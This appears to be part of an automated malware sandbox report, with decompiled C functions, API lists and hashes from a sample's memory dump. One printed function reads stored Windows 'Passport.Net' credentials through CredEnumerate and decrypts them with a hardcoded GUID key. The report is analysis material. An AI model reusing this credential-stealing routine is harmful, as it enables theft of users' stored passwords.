                                                                                                                                                                  0x0040adaf
                                                                                                                                                                  0x0040adbe
                                                                                                                                                                  0x0040adc4
                                                                                                                                                                  0x0040adc6
                                                                                                                                                                  0x0040add0
                                                                                                                                                                  0x0040add0
                                                                                                                                                                  0x0040adeb
                                                                                                                                                                  0x0040adf2
                                                                                                                                                                  0x0040ae03
                                                                                                                                                                  0x0040ae0a
                                                                                                                                                                  0x0040ae12
                                                                                                                                                                  0x0040ae18
                                                                                                                                                                  0x0040ae1a
                                                                                                                                                                  0x0040ae2b
                                                                                                                                                                  0x0040ae1c
                                                                                                                                                                  0x0040ae23
                                                                                                                                                                  0x0040ae28
                                                                                                                                                                  0x0040ae33
                                                                                                                                                                  0x0040ae3b
                                                                                                                                                                  0x0040ae40
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ae48
                                                                                                                                                                  0x0040ae51

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                                                                                                                                                                  • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                                                                                                                                                                  • OpenClipboard.USER32 ref: 0040AE12
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040AE2B
                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014771361-0
                                                                                                                                                                  • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                  • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                                                                                                                                                                  • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                  • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410596, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00410596(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x415314;
				if(_t9 != 0) {
					_push(_t9);
					L00412096();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B8A(_t18);
					_push(_t18);
					L00412096();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B8A(_t19);
					_push(_t19);
					L00412096();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B8A(_t20);
					_push(_t20);
					L00412096();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A7D(_t21);
					_push(_t21);
					L00412096();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A7D(_t22);
					_push(_t22);
					L00412096();
				}
				return _t9;
			}











                                                                                                                                                                  0x00410596
                                                                                                                                                                  0x00410596
                                                                                                                                                                  0x0041059b
                                                                                                                                                                  0x004105a1
                                                                                                                                                                  0x004105a3
                                                                                                                                                                  0x004105a4
                                                                                                                                                                  0x004105a9
                                                                                                                                                                  0x004105ad
                                                                                                                                                                  0x004105af
                                                                                                                                                                  0x004105b7
                                                                                                                                                                  0x004105b9
                                                                                                                                                                  0x004105be
                                                                                                                                                                  0x004105bf
                                                                                                                                                                  0x004105c4
                                                                                                                                                                  0x004105c5
                                                                                                                                                                  0x004105cd
                                                                                                                                                                  0x004105cf
                                                                                                                                                                  0x004105d4
                                                                                                                                                                  0x004105d5
                                                                                                                                                                  0x004105da
                                                                                                                                                                  0x004105db
                                                                                                                                                                  0x004105e3
                                                                                                                                                                  0x004105e5
                                                                                                                                                                  0x004105ea
                                                                                                                                                                  0x004105eb
                                                                                                                                                                  0x004105f0
                                                                                                                                                                  0x004105f1
                                                                                                                                                                  0x004105f9
                                                                                                                                                                  0x004105fb
                                                                                                                                                                  0x00410600
                                                                                                                                                                  0x00410601
                                                                                                                                                                  0x00410606
                                                                                                                                                                  0x00410607
                                                                                                                                                                  0x0041060f
                                                                                                                                                                  0x00410611
                                                                                                                                                                  0x00410616
                                                                                                                                                                  0x00410617
                                                                                                                                                                  0x0041061c
                                                                                                                                                                  0x0041061e

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
                                                                                                                                                                  • Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
                                                                                                                                                                  • Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004016E5, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E004016E5(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                                                                  0x004016f4
                                                                                                                                                                  0x0040170b
                                                                                                                                                                  0x00401715
                                                                                                                                                                  0x0040171d
                                                                                                                                                                  0x0040171e
                                                                                                                                                                  0x00401722
                                                                                                                                                                  0x00401727
                                                                                                                                                                  0x00401737
                                                                                                                                                                  0x0040174d

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 19018683-0
                                                                                                                                                                  • Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                                                                                                                                                                  • Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
                                                                                                                                                                  • Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411A0F, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E00411A0F(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00411533(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BE2A( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BE4E(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BEEC(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BE2A( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BE4E(_t27, _t127,  &_v1172);
						E0040BEEC(_t121, _t127,  &_v24);
						E00405364( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053E0( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053E0(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                                                                                                                                  0x00411a0f
                                                                                                                                                                  0x00411a1b
                                                                                                                                                                  0x00411a2a
                                                                                                                                                                  0x00411a30
                                                                                                                                                                  0x00411a43
                                                                                                                                                                  0x00411a49
                                                                                                                                                                  0x00411a57
                                                                                                                                                                  0x00411a5d
                                                                                                                                                                  0x00411a76
                                                                                                                                                                  0x00411a83
                                                                                                                                                                  0x00411a85
                                                                                                                                                                  0x00411a8b
                                                                                                                                                                  0x00411a8d
                                                                                                                                                                  0x00411a9e
                                                                                                                                                                  0x00411ab4
                                                                                                                                                                  0x00411abc
                                                                                                                                                                  0x00411ac8
                                                                                                                                                                  0x00411ace
                                                                                                                                                                  0x00411ada
                                                                                                                                                                  0x00411add
                                                                                                                                                                  0x00411ae2
                                                                                                                                                                  0x00411af4
                                                                                                                                                                  0x00411afb
                                                                                                                                                                  0x00411b07
                                                                                                                                                                  0x00411b0c
                                                                                                                                                                  0x00411b15
                                                                                                                                                                  0x00411b31
                                                                                                                                                                  0x00411b36
                                                                                                                                                                  0x00411b43
                                                                                                                                                                  0x00411b48
                                                                                                                                                                  0x00411b4e
                                                                                                                                                                  0x00411b53
                                                                                                                                                                  0x00411b55
                                                                                                                                                                  0x00411b58
                                                                                                                                                                  0x00411b63
                                                                                                                                                                  0x00411b63
                                                                                                                                                                  0x00411b66
                                                                                                                                                                  0x00411b6e
                                                                                                                                                                  0x00411b71
                                                                                                                                                                  0x00411b74
                                                                                                                                                                  0x00411b77
                                                                                                                                                                  0x00411b81
                                                                                                                                                                  0x00411b86
                                                                                                                                                                  0x00411b8a
                                                                                                                                                                  0x00411b8d
                                                                                                                                                                  0x00411b8d
                                                                                                                                                                  0x00411b90
                                                                                                                                                                  0x00411b90
                                                                                                                                                                  0x00411b93
                                                                                                                                                                  0x00411b93
                                                                                                                                                                  0x00411b96
                                                                                                                                                                  0x00411b9d
                                                                                                                                                                  0x00411ba2
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba4
                                                                                                                                                                  0x00411ba9
                                                                                                                                                                  0x00411bab
                                                                                                                                                                  0x00411bb4
                                                                                                                                                                  0x00411bb6
                                                                                                                                                                  0x00411bb8
                                                                                                                                                                  0x00411bbb
                                                                                                                                                                  0x00411bbd
                                                                                                                                                                  0x00411bbe
                                                                                                                                                                  0x00411bbe
                                                                                                                                                                  0x00411bb8
                                                                                                                                                                  0x00411bc4
                                                                                                                                                                  0x00411bcd
                                                                                                                                                                  0x00411bcf
                                                                                                                                                                  0x00411bcf
                                                                                                                                                                  0x00411a8d
                                                                                                                                                                  0x00411bd7

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411A30
                                                                                                                                                                  • memset.MSVCRT ref: 00411A49
                                                                                                                                                                  • memset.MSVCRT ref: 00411A5D
                                                                                                                                                                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                  • strlen.MSVCRT ref: 00411A79
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411A9E
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411AB4
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411AF4
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset$strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2142929671-0
                                                                                                                                                                  • Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                  • Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
                                                                                                                                                                  • Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                  • Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407A69, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 36%
                                                                                                                                                                  			E00407A69(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x418540 == 0) {
					E004079E7();
				}
				_t40 =  *0x418538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x418530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x418534 + _t17 * 4)) +  *0x418528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4181b8 == 0) {
							_push( *0x418548 - 1);
							_push( *0x41852c);
							_push(_t39);
							_push(E00407BBF());
							goto L16;
						} else {
							strcpy(0x4182c0, "strings");
							_t31 = E00407EF3(_t39,  *0x41852c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x418548 - 1);
								_push( *0x41852c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41852c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x418548 - 1);
						_push( *0x41852c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x417b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x41344f;
					} else {
						_t23 =  *0x41853c;
						if(_t23 + _t56 + 2 >=  *0x418540 ||  *0x418538 >=  *0x418544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x418528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41852c, _t10);
							 *((intOrPtr*)( *0x418534 +  *0x418538 * 4)) =  *0x41853c;
							 *( *0x418530 +  *0x418538 * 4) = _t39;
							 *0x418538 =  *0x418538 + 1;
							 *0x41853c =  *0x41853c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                                                                                                                  0x00407a69
                                                                                                                                                                  0x00407a70
                                                                                                                                                                  0x00407a72
                                                                                                                                                                  0x00407a72
                                                                                                                                                                  0x00407a77
                                                                                                                                                                  0x00407a7e
                                                                                                                                                                  0x00407a83
                                                                                                                                                                  0x00407a95
                                                                                                                                                                  0x00407a95
                                                                                                                                                                  0x00407a85
                                                                                                                                                                  0x00407a85
                                                                                                                                                                  0x00407a90
                                                                                                                                                                  0x00407a93
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407a93
                                                                                                                                                                  0x00407ac9
                                                                                                                                                                  0x00407ac9
                                                                                                                                                                  0x00407a97
                                                                                                                                                                  0x00407a99
                                                                                                                                                                  0x00407bba
                                                                                                                                                                  0x00407bba
                                                                                                                                                                  0x00407a9f
                                                                                                                                                                  0x00407aa5
                                                                                                                                                                  0x00407ad8
                                                                                                                                                                  0x00407b24
                                                                                                                                                                  0x00407b25
                                                                                                                                                                  0x00407b2b
                                                                                                                                                                  0x00407b31
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407ada
                                                                                                                                                                  0x00407ae4
                                                                                                                                                                  0x00407af0
                                                                                                                                                                  0x00407af5
                                                                                                                                                                  0x00407afa
                                                                                                                                                                  0x00407b0e
                                                                                                                                                                  0x00407b14
                                                                                                                                                                  0x00407b15
                                                                                                                                                                  0x00407b1b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407afc
                                                                                                                                                                  0x00407b07
                                                                                                                                                                  0x00407b0c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407b0c
                                                                                                                                                                  0x00407afa
                                                                                                                                                                  0x00407aa7
                                                                                                                                                                  0x00407aad
                                                                                                                                                                  0x00407aae
                                                                                                                                                                  0x00407ab7
                                                                                                                                                                  0x00407ab8
                                                                                                                                                                  0x00407ab8
                                                                                                                                                                  0x00407b32
                                                                                                                                                                  0x00407b38
                                                                                                                                                                  0x00407b3a
                                                                                                                                                                  0x00407b3a
                                                                                                                                                                  0x00407b3c
                                                                                                                                                                  0x00407bb3
                                                                                                                                                                  0x00407bb3
                                                                                                                                                                  0x00407b3e
                                                                                                                                                                  0x00407b3e
                                                                                                                                                                  0x00407b4d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407b5d
                                                                                                                                                                  0x00407b63
                                                                                                                                                                  0x00407b66
                                                                                                                                                                  0x00407b71
                                                                                                                                                                  0x00407b87
                                                                                                                                                                  0x00407b95
                                                                                                                                                                  0x00407ba0
                                                                                                                                                                  0x00407bac
                                                                                                                                                                  0x00407bb1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407bb1
                                                                                                                                                                  0x00407b4d
                                                                                                                                                                  0x00407b3c
                                                                                                                                                                  0x00407bbe

                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
                                                                                                                                                                  • strlen.MSVCRT ref: 00407B02
                                                                                                                                                                  • LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                  • memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
                                                                                                                                                                    • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                                                                                                  • String ID: strings
                                                                                                                                                                  • API String ID: 1748916193-3030018805
                                                                                                                                                                  • Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                  • Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
                                                                                                                                                                  • Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DC39, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040DC39(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046E1( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404651( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047AA( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x418768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x418768;
							if(E0040481B( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046CC( &_v60);
				E004047FB( &_v584);
				return _t69;
			}























                                                                                                                                                                  0x0040dc39
                                                                                                                                                                  0x0040dc4a
                                                                                                                                                                  0x0040dc4c
                                                                                                                                                                  0x0040dc54
                                                                                                                                                                  0x0040dc57
                                                                                                                                                                  0x0040dc5a
                                                                                                                                                                  0x0040dc5f
                                                                                                                                                                  0x0040dc61
                                                                                                                                                                  0x0040dc77
                                                                                                                                                                  0x0040dc78
                                                                                                                                                                  0x0040dc79
                                                                                                                                                                  0x0040dc7b
                                                                                                                                                                  0x0040dc85
                                                                                                                                                                  0x0040dc8b
                                                                                                                                                                  0x0040dc91
                                                                                                                                                                  0x0040dca3
                                                                                                                                                                  0x0040dcab
                                                                                                                                                                  0x0040dcae
                                                                                                                                                                  0x0040dcb0
                                                                                                                                                                  0x0040dcb1
                                                                                                                                                                  0x0040dcb1
                                                                                                                                                                  0x0040dcbc
                                                                                                                                                                  0x0040dcc4
                                                                                                                                                                  0x0040dcc5
                                                                                                                                                                  0x0040dcdb
                                                                                                                                                                  0x0040dcde
                                                                                                                                                                  0x0040dcec
                                                                                                                                                                  0x0040dd0d
                                                                                                                                                                  0x0040dd26
                                                                                                                                                                  0x0040dd2f
                                                                                                                                                                  0x0040dd2f
                                                                                                                                                                  0x0040dd33
                                                                                                                                                                  0x0040dd33
                                                                                                                                                                  0x0040dd39
                                                                                                                                                                  0x0040dd39
                                                                                                                                                                  0x0040dd3d
                                                                                                                                                                  0x0040dd3d
                                                                                                                                                                  0x0040dc85
                                                                                                                                                                  0x0040dd43
                                                                                                                                                                  0x0040dd4e
                                                                                                                                                                  0x0040dd58

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                    • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                                                                                                                                                                  • strlen.MSVCRT ref: 0040DD15
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 0040DD26
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040DD33
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                  • String ID: Passport.Net\*
